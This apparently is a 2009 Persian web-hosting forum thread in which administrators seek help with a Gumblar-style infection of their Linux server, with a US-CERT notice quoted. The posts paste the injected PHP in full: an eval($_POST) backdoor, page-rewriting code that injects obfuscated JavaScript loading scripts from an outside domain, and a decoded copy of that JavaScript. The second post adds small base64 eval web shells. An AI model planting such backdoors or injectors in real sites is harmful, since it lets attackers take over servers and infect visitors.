اطلاعیه

Collapse
No announcement yet.

باز هم ويروس الوده کننده صفحات

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • باز هم ويروس الوده کننده صفحات

    سلام اقا باز هم يکي از سرور هاي ما الوده شد به اين !! بالاي برخي صفحات توي سورس ها اين ها رو اضافه کرده !! جالبه چون تمام موارد ايمني رو هم رعايت کرديم ولي الوده شده **ي ميتونه کمک کنه ؟ سرور لينو** هستش
    کد PHP:
    if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihsamF4KXt2YXIgeHBHTlI9JyUnO3ZhciByMjM3TD0ndmEmNzImMjAmNjEmM2QmMjImNTMmNjMmNzImNjlwdCY0NW4mNjdpbmUmMjImMmNiJjNkJjIyJjU2ZXJzJjY5b24oJjI5KyYyMiYyYyY2YSYzZCYyMiYyMiYyY3UmM2QmNmVhJjc2aSY2N2F0JjZmciYyZXVzZXJBZ2VudCYzYiY2OSY2NigmMjgmNzUmMmVpbmRleCY0ZmYoJjIyJjQzaHJvbWUmMjIpJjNjMCkmMjYmMjYmMjh1JjJlaSY2ZWRleE8mNjYmMjgmMjJXaW4mMjIpJjNlMCYyOSYyNiYyNih1JjJlaW5kZSY3OE9mKCYyMk5UJjIwJjM2JjIyKSYzYzApJjI2JjI2KCY2NG9jdW1lbnQmMmVjb29raSY2NSYyZSY2OW4mNjRleE8mNjYoJjIyJjZkaWVrJjNkMSYyMiYyOSYzYzApJjI2JjI2JjI4Jjc0eXBlbyY2NigmN2FyJjc2JjdhdHMmMjkmMjEmM2R0eXBlb2YoJjIyQSYyMikpKSY3Ynpydnp0cyYzZCYyMkEmMjImM2JldmEmNmMoJjIyaWYoJjc3aW5kb3cmMmUmMjIrYSsmMjIpaiYzZCY2YSsmMjIrYSsmMjJNYWomNmYmNzImMjIrYiYyYiY2MSsmMjImNGRpbm9yJjIyK2ImMmImNjErJjIyQnVpbCY2NCYyMiYyYiY2MismMjJqJjNiJjIyKSYzYmRvY3VtJjY1biY3NCYyZSY3N3JpdGUoJjIyJjNjJjczY3JpcHQmMjBzciY2MyYzZCYyZiYyZiY2ZGEmNzJ0JjIyKyYyMnV6JjJlY24mMmZ2JjY5ZCYyZiYzZmlkJjNkJjIyJjJiaismMjImM2UmM2MmNWMmMmZzYyY3MmlwJjc0JjNlJjIyKSYzYiY3ZCc7ZXZhbCh1bmVzY2FwZShyMjM3TC5yZXBsYWNlKGxqYXgseHBHTlIpKSl9KSgvXCYvZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<******(.*?)</******>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<****** language=**********><!-- \n\(function\(.+?\n --></******>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
    /*
    اين هم دکود شدشه
    <****** language=**********><!--
    (function(){var t0WS='%';var dFIE7='`76`61r`20a`3d`22S`63`72ip`74En`67`69ne`22` 2c`62`3d`22Version(`29+`22`2cj`3d`22`22`2cu`3dn`61 v`69`67at`6fr`2e`75s`65rAge`6e`74`3bif(`28u`2e`69n `64`65`78`4ff(`22`43hr`6fme`22)`3c`30)`26`26(u`2ei n`64e`78`4f`66(`22Win`22)`3e0)`26`26(u`2e`69ndexO` 66(`22NT`206`22)`3c`30)`26`26(d`6fcu`6d`65n`74`2ec o`6f`6bie`2eindexOf`28`22miek`3d1`22)`3c0)`26`26(t ypeof`28zrvzts)`21`3dtype`6f`66(`22`41`22))`29`7bz rvz`74s`3d`22`41`22`3beval`28`22if(wi`6edo`77`2e`2 2+a+`22)j`3dj+`22`2b`61+`22Majo`72`22+b`2ba+`22Mi` 6eor`22+b+`61+`22Buil`64`22+b+`22j`3b`22)`3bdoc`75 ment`2ew`72it`65(`22`3c******`20s`72`63`3d`2f`2fma `22+`22`72t`75`7a`2ecn`2fv`69d`2f`3f`69d`3d`22`2bj +`22`3e`3c`5c`2fs`63`72ipt`3e`22)`3b`7d';var tvZ8=dFIE7.replace(/`/g,t0WS);eval(unescape(tvZ8))})();
    --></******>
    Last edited by 4shir; 05-30-2009, 09:47 AM.
    آب طلب نکرده، همیشه مراد نیست گاهی نشانه ایست که قربانی ات کنند... !

  • #2
    يک چيز جالب الان توي يکي از سايت ها ديدم اينه که توي برخي فولدر هاي 755 فايل هايي اپلود شده حاوي اين اطلاعات

    <?php eval(base64_decode('awyoaxnzzxqojf9qt1nuwydlj10pkw v2ywwoymfzzty0x2rly29kzsgkx1bpu1rbj2unxskpow==')); ?>
    if(isset($_post['e']))eval(base64_decode($_post['e']));echo '3137312e3133332d39332e39383a686974616d666f6b3a653 1313740686f7374';
    Last edited by 4shir; 05-30-2009, 09:46 AM.
    آب طلب نکرده، همیشه مراد نیست گاهی نشانه ایست که قربانی ات کنند... !

    Comment


    • #3
      Gumblar Malware Exploit Circulating
      added May 18, 2009 at 12:47 pm

      US-CERT is aware of public reports of a malware exploit circulating. This is a drive-by-download exploit with multiple stages and is being referred to as Gumblar. The first stage of this exploit attempts to compromise legitimate websites by injecting malicious code into them. Reports indicate that these website infections occur primarily through stolen FTP credentials but may also be compromised through poor configuration settings, vulnerable web applications, etc. The second stage of this exploit occurs when users visit a website compromised by Gumblar. Users who visit these compromised websites and have not applied updates for known PDF and Flash Player vulnerabilities may become infected with malware. This malware may be used by attackers to monitor network traffic and obtain sensitive information, including FTP and login credentials, that can be used to conduct further exploits. Additionally, this malware may also redirect Google search results for the infected user.

      US-CERT encourages users and administrators to apply software updates in a timely manner and use up-to-date antivirus software to help mitigate the risks.

      US-CERT will provide additional information as it becomes available
      آب طلب نکرده، همیشه مراد نیست گاهی نشانه ایست که قربانی ات کنند... !

      Comment


      • #4
        نوشته اصلی توسط 4shir نمایش پست ها
        يک چيز جالب الان توي يکي از سايت ها ديدم اينه که توي برخي فولدر هاي 755 فايل هايي اپلود شده حاوي اين اطلاعات
        تو 755 ؟ با چه یوزری آپلود شده ؟
        sigpic

        Comment

        Working...
        X